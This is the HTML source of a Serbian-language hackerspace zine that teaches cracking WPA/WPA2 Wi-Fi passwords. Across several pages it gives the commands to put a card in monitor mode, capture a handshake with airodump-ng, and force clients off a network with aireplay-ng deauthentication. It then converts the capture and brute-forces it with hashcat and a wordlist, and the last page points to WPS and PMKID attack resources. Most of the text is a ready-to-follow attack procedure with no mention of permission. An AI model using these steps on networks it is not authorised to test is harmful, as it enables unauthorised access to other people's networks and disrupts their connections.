<!DOCTYPE html>
<meta charset="utf-8">
<link rel="stylesheet" href="./style.css">

<main class="zine">
  <header class="zine-page page-1">
    <!-- page 1 content -->
    <h1>WIFI HACKING</h1>
    <h2>
        razbijanje WPA/WPA2 uz pomoc
        <code>aircrack-ng</code> i
        <code>hashcat</code>
        alata.
    </h2>
    <section style="text-align:center">
        <h3>hklbgd</h3>
        <h3><i>hklbgd.org</i></h3>
    </section>
  </header>
  <section class="zine-page page-2">
    <!-- page 2 content -->
    <h1>Priprema</h1>
    <p>
        Potrebno je instalirati programe
        <code>aircrack-ng</code> i <code>hashcat</code>.
        I drajvere za graficku karticu.
    </p>
    <h2>Podesavanje wifi interfejsa</h2>
    <p>
        Pronadjemo naziv interfejsa uz pomoc komande<br>
        <code>ip a</code>
        <pre style="font-size:0.3rem;">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s25: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast state DOWN group default qlen 1000
    link/ether 00:1f:16:37:d8:48 brd ff:ff:ff:ff:ff:ff
3: wls1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:26:c6:8a:00:26 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.104/24 brd 192.168.0.255 scope global dynamic noprefixroute wls1
       valid_lft 6532sec preferred_lft 6532sec
    inet6 fe80::8afa:e05b:896c:83f5/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
        </pre>
        Zapamtimo ime wifi interfejsa, u ovom slucaju <i>wls1</i> posle aktiviranja <b>monitor mode</b>-a
        ime ce postati <i>wls1mon</i>, to koristimo u komandama umesto &lt;ifacemon&gt;, kod vas ime moze
        biti drugacije.
    </p>
  </section>
  <section class="zine-page page-3">
    <!-- page 3 content -->
    <h1>Monitor mode</h1>
    <p>Komandom<br>
    <code>airmon-ng start &lt;iface&gt;</code><br>
    ubacujemo mreznu karticu u <b>monitor mode</b>.
    Monitor mode nam omogucava da pratimo sav sadrzaj za wifi mrezne kartice,
    ne samo sa mreze na koju smo povezani. I on nam omogucava da uzmemo <b>handshake</b>
    koji nam je potreban za dalje.
    </p>
  </section>
  <section class="zine-page page-4">
    <!-- page 4 content -->
    <h1>Nalazenje mreze</h1>
    <p>Komandom<br>
    <code>airodump-ng &lt;ifacemon&gt;</code> posmatramo koje se mreze nalaze oko nas.
    Videcemo tabelu i odatle su nam bitna sledeca polja:
    <ul>
        <li>
           <b>CH</b>, kanal, ovo je bitan podatak za dalji rad
        </li>
        <li>
            <b>BSSID</b>, MAC adresa mreze
        </li>
        <li>
            <b>ENC</b>, zastita, trazimo WPA/WPA2
        </li>
        <li>
            <b>PWR</b>, snaga signala, sto veci broj to bolje
        </li>
        <li>
            <b>AUTH</b>, mod autentifikacije, trazimo <b>PSK</b>
        </li>
    </ul>
  </section>
  <section class="zine-page page-5">
    <!-- page 5 content -->
    <h1>Hvatanje handshake-a</h1>
    <p>
        Kada odredimo koju mrezu napadamo krecemo da slusamo za <b>handshake</b>
        komandom<br>
        <code>airodump-ng -c &lt;kanal&gt; --bssid &lt;BSSID&gt; -w handshake &lt;ifacemon&gt;</code>
        Da bismo snimili handshake potrebno je da se neko poveze na mrezu, dakle cekamo dok se to ne desi.
        Kada je handshake uhvacen to ce pisati u gornjem desnom uglu. Tada mozemo da prekinemo slusanje.
        Ispod tabele za mrezama nalazi se tabela sa klijentima, za aktivno skidanje klijenta nam je
        potrebna MAC adresa pa je korisno to zapisati.
    </p>
  </section>
  <section class="zine-page page-6">
    <!-- page 6 content -->
    <h1>Hvatanje handshake-a</h1>
    <p>
    Ukoliko nam se ne ceka, mozemo nekoga skinuti sa mreze i cekati da se opet poveze.
    Pre svega ostavimo <code>airodump-ng</code> da slusa, ista komanda kao na prethodnoj strani.
    I onda skinemo sve klijente sa mreze komandom:<br>
    <code>aireplay-ng -0 10 -a &lt;BSSID&gt; &lt;ifacemon&gt;</code>
    Ukoliko ne uspe iz prve, probamo opet. Mozemo i skinuti pojedinacnog klijenta sledecom komandom
    <code>aireplay-ng -0 10 -a &lt;BSSID&gt; -c &lt;MAC_KLIJENTA&gt; &lt;ifacemon&gt;</code>
    </p>   
  </section>
  <section class="zine-page page-7">
    <!-- page 7 content -->
    <h1>Priprema handshake-a za hashcat</h1>
    Posle uspesno uhvacenog handshake-a u folderu ce se pojaviti par novih fajlova.
    Bitan fajl nam je <code>handshake-01.cap</code> od njega pravimo fajl koji
    <code>hashcat</code> moze da procita komandom<br>
    <code>aircrack-ng -J handshake-01.cap</code>
    Sada imamo <code>handshake-01.hccpx</code> njega razbijamo uz pomoc <code>hashcat</code>-a komandom<br>
    <code>hashcat -m 2500 handshake-01.hccpx recnik.txt</code>
  </section>
  <footer class="zine-page page-8">
    <!-- page 8 content -->
    <h1>Informacije za dalje</h1>
    <ul>
        <li>
            <code>man aircrack-ng</code>, <code>man hashcat</code>
        </li>
        <li>
            <code>git.hklbgd.orb/hklbgd/wifi</code>, recnici, liste sifara, handshake-ovi
        </li>
        <li>
            <code>https://www.aircrack-ng.org/doku.php</code>wiki od aircrack-ng 
        </li>
        <li>
            <code>https://hashcat.net/wiki/</code>, hashcat wiki
        </li>
        <li>
            <code>https://www.pwnieexpress.com/blog/wps-cracking-with-reaver</code>, napad preko WPS-a
        </li>
        <li>
            <code>https://hashcat.net/forum/thread-7717.html</code>, PMKID napad
        </li>
        
    </ul>
  </footer>
</main>

